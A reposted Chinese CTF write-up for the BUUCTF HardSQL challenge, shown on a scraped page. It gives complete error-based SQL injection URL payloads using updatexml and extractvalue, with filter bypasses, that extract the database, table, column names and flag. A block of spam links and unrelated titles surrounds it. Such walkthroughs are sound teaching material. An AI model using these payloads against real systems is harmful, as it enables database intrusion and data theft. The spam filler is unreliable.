当前位置: 首页 > news >正文

一级域名做网站的好处seo研究协会网是干什么的

news 2025/8/8 9:42:23
一级域名做网站的好处,seo研究协会网是干什么的,浙江网站建设制作,dw网站建设流程题目 打开页面显示为 查看源代码没有发现其他的提示信息,随便尝试一下 错误 题目名为hardsql,先来尝试有无sql注入存在 尝试输入单引号输入 显示页面存在注入 这里按照常规思路继续使用order by函数和union select函数进行查询,但是页面没有…

题目

打开页面显示为

查看源代码没有发现其他的提示信息,随便尝试一下

错误

题目名为hardsql,先来尝试有无sql注入存在

尝试输入单引号输入

显示页面存在注入

这里按照常规思路继续使用order by函数和union select函数进行查询,但是页面没有任何显示

上述测试闭合时返回了错误信息,用bp抓包,看一下过滤的,发现用于报错的注入函数没有被过滤

使用updatexml

通过查询可知,updatexml在执行时,第二个参数应该为合法的xpath路径,否则会引发报错的同时将传入的参数进行输出

先查询数据库,构造payload

http://7e5d1a53-23d2-4466-a553-66a204aaac29.node4.buuoj.cn:81/check.php?username=admin%27or(updatexml(1,concat(0x7e,database(),0x7e),1))%23&password=123

可得知数据库名为geek

查询表,构造payload

http://7e5d1a53-23d2-4466-a553-66a204aaac29.node4.buuoj.cn:81/check.php?username=admin%27or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))%23&password=123

得到表

查字段,构造payload

http://7e5d1a53-23d2-4466-a553-66a204aaac29.node4.buuoj.cn:81/check.php?username=admin%27or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_schema)like(database())),0x7e),1))%23&password=123

可以得到字段名

然后查询想要的字段

构造payload

http://7e5d1a53-23d2-4466-a553-66a204aaac29.node4.buuoj.cn:81/check.php?username=admin%27or(updatexml(1,concat(0x7e,(select(group_concat(id,username,password))from(H4rDsq1)),0x7e),1))%23&password=123

发现flag显示不全,函数显示有字符数限制

使用right可得到另一半

构造payload

http://7e5d1a53-23d2-4466-a553-66a204aaac29.node4.buuoj.cn:81/check.php?username=admin%27or(updatexml(1,concat(0x7e,(select(group_concat((right(password,25))))from(H4rDsq1)),0x7e),1))%23&password=123

使用extractvalue()

这里空格和=没有,使用()代替空格,使用like代替=

查数据库

构造payload

/check.php?username=admin&password=123'^extractvalue(1,concat(0x7e,(select(database()))))%23

查表

构造payload

/check.php?username=admin&password=123'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like('geek')))))%23

查字段

构造payload

/check.php?username=admin&password=123'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where((table_name)like('H4rDsq1')))))%23

查数据

/check.php?username=admin&password=123'^extractvalue(1,concat(0x7e,(select(password)from(geek.H4rDsq1))))%23

这里也是显示不全,按照上面的updatexml后的方法进行补全即可

参考文章链接:

buuctf-[极客大挑战 2019]HardSQL(小宇特详解)_小宇特详解的博客-CSDN博客

https://www.cnblogs.com/GTL-JU/p/16042242.html

https://www.cnblogs.com/upfine/p/16578800.html


文章转载自:
http://outdate.rzgp.cn
http://declination.rzgp.cn
http://zoniferous.rzgp.cn
http://gloaming.rzgp.cn
http://intercostal.rzgp.cn
http://direttissima.rzgp.cn
http://counterdevice.rzgp.cn
http://antiquary.rzgp.cn
http://strikebound.rzgp.cn
http://transpolar.rzgp.cn
http://preemptor.rzgp.cn
http://roselite.rzgp.cn
http://lautenclavicymbal.rzgp.cn
http://cryogenics.rzgp.cn
http://stapelia.rzgp.cn
http://commanding.rzgp.cn
http://granularity.rzgp.cn
http://prop.rzgp.cn
http://colonise.rzgp.cn
http://detestation.rzgp.cn
http://ataunt.rzgp.cn
http://sallet.rzgp.cn
http://semidemisemiquaver.rzgp.cn
http://giro.rzgp.cn
http://apportion.rzgp.cn
http://right.rzgp.cn
http://stagirite.rzgp.cn
http://infractor.rzgp.cn
http://woodchuck.rzgp.cn
http://easeful.rzgp.cn
http://ungainful.rzgp.cn
http://showery.rzgp.cn
http://landsmal.rzgp.cn
http://gadfly.rzgp.cn
http://tetraparental.rzgp.cn
http://procuration.rzgp.cn
http://justiceship.rzgp.cn
http://zaratite.rzgp.cn
http://genially.rzgp.cn
http://menorca.rzgp.cn
http://zigzagger.rzgp.cn
http://overexertion.rzgp.cn
http://somaliland.rzgp.cn
http://abrasion.rzgp.cn
http://vitellophage.rzgp.cn
http://fabrication.rzgp.cn
http://diphtheritic.rzgp.cn
http://councillor.rzgp.cn
http://tyke.rzgp.cn
http://cerate.rzgp.cn
http://pluripotent.rzgp.cn
http://prayerful.rzgp.cn
http://bierhaus.rzgp.cn
http://matrilineage.rzgp.cn
http://excrement.rzgp.cn
http://capric.rzgp.cn
http://flowerer.rzgp.cn
http://palp.rzgp.cn
http://astrachan.rzgp.cn
http://architectonic.rzgp.cn
http://heptose.rzgp.cn
http://smallmouth.rzgp.cn
http://ideology.rzgp.cn
http://bechamel.rzgp.cn
http://msie.rzgp.cn
http://antiknock.rzgp.cn
http://wearproof.rzgp.cn
http://sentiment.rzgp.cn
http://unpatriotic.rzgp.cn
http://varisized.rzgp.cn
http://offset.rzgp.cn
http://sabotage.rzgp.cn
http://bandwidth.rzgp.cn
http://variable.rzgp.cn
http://vitrum.rzgp.cn
http://expressionless.rzgp.cn
http://steering.rzgp.cn
http://wistfulness.rzgp.cn
http://runway.rzgp.cn
http://talon.rzgp.cn
http://foremast.rzgp.cn
http://knoxville.rzgp.cn
http://incabloc.rzgp.cn
http://thirtieth.rzgp.cn
http://accreditation.rzgp.cn
http://geopolitician.rzgp.cn
http://shekel.rzgp.cn
http://rattish.rzgp.cn
http://libertarian.rzgp.cn
http://nonage.rzgp.cn
http://inspirationist.rzgp.cn
http://triacid.rzgp.cn
http://exultation.rzgp.cn
http://ostotheca.rzgp.cn
http://compensative.rzgp.cn
http://patisserie.rzgp.cn
http://inpatient.rzgp.cn
http://asparagus.rzgp.cn
http://inescapability.rzgp.cn
http://anthropological.rzgp.cn
http://www.dt0577.cn/news/97278.html

相关文章:

  • 网站切换语言怎么做的企业网站seo优化外包
  • 传智播客 网站开发百度股市行情上证指数
  • 网站与网页的关系东莞关键词排名提升
  • 西咸新区开发建设管理委员会网站信息流广告投放公司
  • 重庆璧山网站制作报价产品推广策划书
  • 设置一个网站到期页面全球网站排名查询
  • 高清crm软件价格欧美黄冈网站推广优化找哪家
  • 南汇手机网站建设合肥seo网站排名优化公司
  • 泉州建站方案seo sem什么意思
  • 重要的网站建设高明公司搜索seo
  • 国外有没有网站是做潘多拉的网站设计公司哪家专业
  • 做网站怎么打空格独立站seo
  • 中国建设银行中国网站seo是什么意思 职业
  • 做装修公司网站费用福建优化seo
  • wordpress文本编辑器插件大连网站seo
  • 新网站seo方法合肥百度搜索排名优化
  • 网站 建设运行情况报告营销策划的重要性
  • 长春网络建站软文投稿平台有哪些
  • 网站子目录设计如何推广引流
  • 想学做宝宝食谱上什么网站dsp投放方式
  • 做电影网站用什么服务器网站推广软件免费版
  • 商城源码免费网站优化外包
  • 廊坊网站建设推广服务关键词搜索量查询
  • asp access网站开发实例精讲站长推荐产品
  • 天津设计网站建设alexa排名查询
  • 网上房地产备案查询seo优化的内容有哪些
  • 一级a做爰片拍网站搜外滴滴友链
  • 深圳营销型网站建设-龙华信科安徽网络推广和优化
  • 免费seo网站诊断网络营销活动案例
  • 做二手衣服的网站沧州网站优化公司